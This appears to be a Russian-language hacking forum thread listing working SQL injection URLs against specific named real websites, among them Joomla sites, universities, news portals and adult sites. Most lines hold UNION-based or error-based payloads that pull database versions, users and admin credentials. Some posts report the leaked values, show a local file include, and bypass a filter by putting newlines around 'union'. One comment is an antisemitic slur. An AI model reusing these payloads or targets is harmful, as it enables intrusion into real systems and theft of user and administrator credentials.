Code: http://www.visoflora.com/index.php?option=com_visoflora&task=grainevariete&id=-67+UNION+SELECT+1,2,3,4,5,6,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54%20from%20jos_users--&Itemid=10 Username: visofloracom@localhost Version: 5.0.51a-24+lenny5-log Database: visofloracom Google PR: 5 GooglePage: 1,060,000 Joomla
Code: http://hpbikes.com/news.php?id=74+and+0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12+--+ http://www.sncorp.com/press_more_info.php?id=468+and+0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11+--+ http://www.rfidjournalevents.com/virtual_agenda.php?eid=9'+and+0+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13+--+ http://www.profitchoice.com/webdir/dir_display.php?cat_id=13'+and+0+UNION+SELECT+concat_ws(0x3a,user(),version(),database())+--+ http://www.theshiva.net/resources.php?category_id=19+and+0+/*!UNION*/+/*!SELECT*/+concat_ws(0x3a,user(),version(),database())+--+ http://www.synchronica.com/p/announcement.php?id=42+and+0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6+--+ http://www.amtelnet.com/news/newsarticle.php?id=800537967+and+0+/*!UNION*/+/*!SELECT*/+1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+ http://www.tarksheel.com/articles.php?aid=5+and+0+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10 http://www.sussexmedicalchambers.co.uk/articles.php?aid=15'+and+0+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8+--+ http://www.spinsnap.com/articles.php?aid=88+and+0+UNION+SELECT+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12+--+ http://www.sotder.org/health_articles.php?aid=665+and+0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database())+--+ http://www.seomanualsubmission.com/seo-link-building-articles.php?aid=7+and+0+/*!UNION*/+/*!SELECT*/+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12+--+ http://www.pongworld.com/articles/articles.php?aid=21+and+0+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4,5+--+
Code: http://www.antibiotic.ru/news.php?y=2011 or 1 group by concat(version(),floor(rand(0)*2)) having min(0) or 1+--+ тиц 1400, pr 5
Code: http://www.chale.ru/pts/admin/index.php?action=edit&categoryID=1&page=&link=0 union select 1,2,3,user(),5,6,7 -- a Админка доступна почти без авторизации.
А ведь я хотел купить у них палатку)))) http://www.lodki-palatki.ru/article.php?articleId=-19%20union%20select%20concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),2,3,4+-- 5.0.92-log:lodkipa9_web@localhost:lodkipa9_webortbld-freebsd7.4
Cпортивный видеопортал Екатеринбурга. Code: http://www.uralvideosport.ru/news.php?num=1488-14.88+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),3,4,5,6,7,8,9,10-- Внутри есть БД с информацией для подключения к FTP Database Version: 5.0.32-Debian_7etch8-log Database name: u6378 User name: root@localhost ТИЦ: 150 PR: 4 Компания ОМЕГА - разработчик программного обеспечения. Code: http://www.omega.ru/pressreleases/view_relise.php?id=1-1.1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),3,4,5,6,7,8,9,10,11-- Эти ребята делают ПО для СУБД ^^ Database Version: 4.0.27 Database name: news User name: [email protected] ТИЦ: 375 PR: 3 ЧТУП "ПрофЭлектроника" - Поставщик систем безопасности в Беларуси. Code: http://www.pel.by/video_price_t.php?ID=1-0.1+UNION+SELECT+1,2,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),4,5,6,7,8-- Database Version: 5.0.92-community Database name: sobby_sob2 User name: sobby_sob2@localhost ТИЦ: 10 PR: 3 Институт Катона — американская исследовательская и просветительская организация. Code: http://www.cato.org/pressroom.php?display=news&id=1-1.1+UNION+SELECT+CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),2,3,4,5-- Database Version: 5.1.56-rs Database name: cato User name: [email protected] ТИЦ: 300 PR: 7 Расово еврейский сайт. Code: http://www.torah.org/qanda/seequanda.php?id=666-666.666+UNION+SELECT+1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),5,6,7,8,9,10,11-- Database Version: 4.1.11-Debian_etch1-log Database name: jln User name: [email protected] ТИЦ: 40 PR: 6 Mohammad Ali Jinnah University. Code: http://jinnah[COLOR=Red].edu[/COLOR]/academic.php?id=1-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),13,14,15,16,17,18,19,20-- File_Priv = Y Но там уже кто-то тусовался ... Database Version: 5.5.15 Database name: maju User name: root@localhost ТИЦ: 0 PR: 6
http://www.fap.pdx.edu/floorplans/detail.php?buildingID=-13'+union+select+1,2,3,4,5,6,7,version(),9,0,11,12,13,14,15,16--+ Database Version: 5.0.77 Database name: fapws User name: [email protected]
какой то там университет Брюселя внутри таблы экзаменов за 2012 и т д (админку было искать лень) Code: http://huis.vub.ac.be/lessenlees.php?lescode=-117+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+RageUsers+limit+1,1--+
в админку не пускает((( не нравится мой айпи((( http://101rabota.ru/admin/ http://www.101rabota.ru/allrez.php?showgr=-5+union+select+1,concat(login,0x3a,password),3333,4,5+from+users_admin+limit+0,1+--+
Code: http://www.uveitisclinicaltrials.com/index.php?option=[COLOR=Green]com_sl[/COLOR]&view=form&site_id=-30'+union+select+concat_ws(0x3a,username,password,usertype,0x4861636b6564206279204572656565)+from+jos_users+limit+0,1--+f
SQL INJECTION (error-based) && Local File Include Для проведения SQL Inj необходимо посылать кавычку не url-кодируя ее в %27. В бд идет $_SERVER['REQUEST_URI'], так что ваши параметры не декодируются автоматически. INSERT запрос. Code: http://www.zvuk.uu.ru/catalog/article.php?file=ololosha'or%28select/**/count%28*%29/**/from/**/%28select/**/1/**/union/**/select/**/2/**/union/**/select/**/3%29x/**/group/**/by/**/concat%28version%28%29,floor%28rand%280%29*2%29%29%29and' version(): 4.1.15-log user(): [email protected] SAFE MODE = On Инклуд картинки для примера: Code: http://www.zvuk.uu.ru/catalog/article.php?file=../../../catalog/images/logo.gif
Code: http://www.ballarat.com/bookingservice/booking_request.php?id=-664+UNION+SELECT 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127+from+information_schema.tables+limit+16,1+--+
Code: http://www.justhotgayporn.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a http://www.toptrannysex.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a http://smoketube.tv/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a http://www.bukkakevideos.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a http://mobile.youngporngirlz.com/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a http://mobile.pornstarblitz.com/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a http://www.gay-bukkake.org/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a http://mobile.boinktube.com/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a 
http://www.justhotgayporn.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a http://www.publicdomaintube.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a http://www.standupcomedyspot.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a http://www.freepornmarttube.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a
http://www.yuzhno-sakhalinsk.net/object.php?pg=2&type=-146%20union%20select%201,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16+-- 5.1.41-log [email protected] tiba102_info portbld-freebsd7.2
Code: http://www.blackco.net/modules.php?name=photo&u=Stalker%20XL&un=1&clan=BlackCompany'%20and%201=1+union+select%201,@@version,3,4,5,6,7,8,9,10%20--%20f&sex=1&level=7&align= YOU ARE SLAPPED BY NUKECOPS BY USING 'union' INSIDE 'name=photo&u=Stalker%20XL&un=1&clan=BlackCompany%27%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10%20--%20f&sex=1&level=7&align='. NUKECOPS, ох лол: %0Aunion%0A Code: http://www.blackco.net/modules.php?name=photo&u=Stalker%20XL&un=1&clan=BlackCompany'%20and%201=1%0Aunion%0Aselect%201,@@version,3,4,5,6,7,8,9,10%20--%20f&sex=1&level=7&align=
В ТОПКУ http://uanato.info/index.php?pokaz=-7690%20and%201=2%20union%20select%201,2,3,4,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),6+-- 4.1.22-standard-log ospuai_ospuai@localhost ospuai_nato pc-linux-gnu